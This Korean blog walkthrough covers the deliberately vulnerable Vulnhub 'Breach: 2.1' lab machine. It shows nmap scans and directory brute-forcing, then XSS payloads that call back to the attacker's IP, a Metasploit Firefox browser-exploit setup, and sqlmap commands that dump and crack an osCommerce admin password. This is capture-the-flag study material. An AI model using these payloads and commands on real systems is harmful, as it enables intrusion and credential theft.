Vulnhub

[Vulnhub] Breach: 2 Walkthrough

jeff_kim 2024. 7. 23. 17:55

https://www.vulnhub.com/entry/breach-21,159/

 

Breach: 2.1

This mentions the name of this release, when it was released, who made it, a link to 'series' and a link to the homepage of the release. It's common for an author to release multiple 'scenarios', making up a 'series' of machines to attack.

www.vulnhub.com

이번 실습 VM 또한 192.168.110.151로 IP가 고정되어있다고 합니다

 

Reconnaissance

IP discovery

└─$ sudo nmap -sn 192.168.110.0/24
Nmap scan report for 192.168.110.151
Host is up (0.00018s latency).
MAC Address: 00:0C:29:FB:15:58 (VMware)

#pasing
└─$ cat ./recon/tcpAll.nmap | grep -i '/tcp' | awk '{ print $1 }' | grep -i '/' | cut -d '/' -f 1 | paste -s -d ','
111,51891,65535

 

└─$ sudo nmap -p 111,51891,65535 -Pn -n --open -sV -sC -iL scope.txt -oA ./recon/tcpDetailed
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 02:54 EDT
Nmap scan report for 192.168.110.151
Host is up (0.00032s latency).

PORT      STATE SERVICE VERSION
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          41558/tcp6  status
|   100024  1          44049/udp   status
|   100024  1          51891/tcp   status
|_  100024  1          55652/udp6  status
51891/tcp open  status  1 (RPC #100024)
65535/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)
| ssh-hostkey: 
|   1024 f3:53:9a:0b:40:76:b1:02:87:3e:a5:7a:ae:85:9d:26 (DSA)
|   2048 9a:a8:db:78:4b:44:4f:fb:e5:83:6b:67:e3:ac:fb:f5 (RSA)
|   256 c1:63:f1:dc:8f:24:81:82:35:fa:88:1a:b8:73:40:24 (ECDSA)
|_  256 3b:4d:56:37:5e:c3:45:75:15:cd:85:00:4f:8b:a8:5e (ED25519)
MAC Address: 00:0C:29:FB:15:58 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.13 seconds

얻은 정보

Peter:inthesource

바로 종료되어버렸는데요, 포트스캐닝을 다시 돌려보겠습니다

└─$ sudo nmap -p- -iL scope.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 03:08 EDT
Nmap scan report for 192.168.110.151
Host is up (0.0023s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
51891/tcp open  unknown
65535/tcp open  unknown
MAC Address: 00:0C:29:FB:15:58 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 16.99 seconds

 

비밀번호가 입력되면서 80번 포트가 트리거 되는가봅니다

한번 접속해서 정보 수집을 계속 진행해보겠습니다

 

HTTP

페이지 소스, robots.txt 는 별다른 특이사항 없습니다

gobuster를 이용해 디렉터리 브루트포싱을 진행해보겠습니다

 

Vulnerability

/blog 경로를 추가해 한번더 디렉터리 브루트포싱을 진행해봅니다

/smilies에서는 별다른 특이사항 없었음

tinymce 라는 폴더가 있습니다

아까 웹 사이트에서 봤을때는 활용할 만한 특이점이 없었던 것같고, 

 

blogphp에 대한 취약점을 검색합니다

 

Exploitation

XSS와 SQL Injection이 가능한 취약점이 있습니다 CVE-2008-6745 코드도 있군요

 

XSS를 이용해 대상 호스트의 쉘을 우선 획득해보겠습니다

register.html에서 회원가입하는 username을 <img src="http://192.168.110.129:2222"> 로 해줍니다

그전에 nc를 이용한 리스닝 먼저해야겠죠?

└─$ nc -lvp 2222

 

 

이렇게 request를 받을 수 있습니다 웹 사이트는

계속 대기중입니다 테스트를 했으니

 

이제 metasploit을 이용해서 대상 호스트의 쉘을 획득해보겠습니다

이번엔  <iframe src="http://192.168.110.129:2345"></iframe> 을 이용해서 유저를 생성합니다

msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set srvhost 192.168.110.129           
srvhost => 192.168.110.129
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set srvport 1234                      
srvport => 1234                          
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set uripath /                         
uripath => /                                   
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set lport 3333                        
lport => 3333                                                                                 
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > exploit

이 과정을 설명드리자면,

1. nc로 대상호스트의 XSS 취약점을 이용해 공격자 PC 에서 리스닝한다

2. 공격자 PC에서 리스닝되어있는 nc을 이용해 대상호스트에 대한 쉘을 획득한다.

정도가 되겠습니다

 

근데,, 에러가 발생해서 이정도 기법을 이해하는 정도로 하고 마무리하겠습니다..

다음에 다시 도전해보겠습니다

 

SQL injection이 가능하다고 해서 아래 코드와 같이 sqlmap을 이용해서 admin 계정에 대한 해시화된 비밀번호 획득 그리고 MD5 복호화를 통해 admin 획득 완료 했습니다

sqlmap -r search.txt -dbs --batch
sqlmap -r search.txt -dbs -D oscommerce --tables --batch
sqlmap -r search.txt -dbs -D oscommerce -T osc_administrators --dump --batch


available databases [5]:
[*] blog
[*] information_schema
[*] mysql
[*] oscommerce
[*] performance_schema

Database: oscommerce
Table: osc_administrators
[1 entry]
+----+-----------+-------------------------------------+
| id | user_name | user_password                       |
+----+-----------+-------------------------------------+
| 1  | admin     | 685cef95aa31989f2edae5e055ffd2c9:32 |
+----+-----------+-------------------------------------+


# admin credentials
admin:32admin

 

'Vulnhub' 카테고리의 다른 글

[Vulnhub] Bob Walkthrough  (0) 2024.07.25
[Vulnhub] NullByte Walkthrough  (3) 2024.07.24
[Vulnhub] Brearch Walkthrough  (6) 2024.07.22
[Vulnhub] Tommy Boy Walkthrough  (4) 2024.07.17
[Vulnhub] RickdiculouslyEasy Walkthrough  (1) 2024.07.16

'Vulnhub'의 다른글

  • 현재글[Vulnhub] Breach: 2 Walkthrough

관련글

티스토리툴바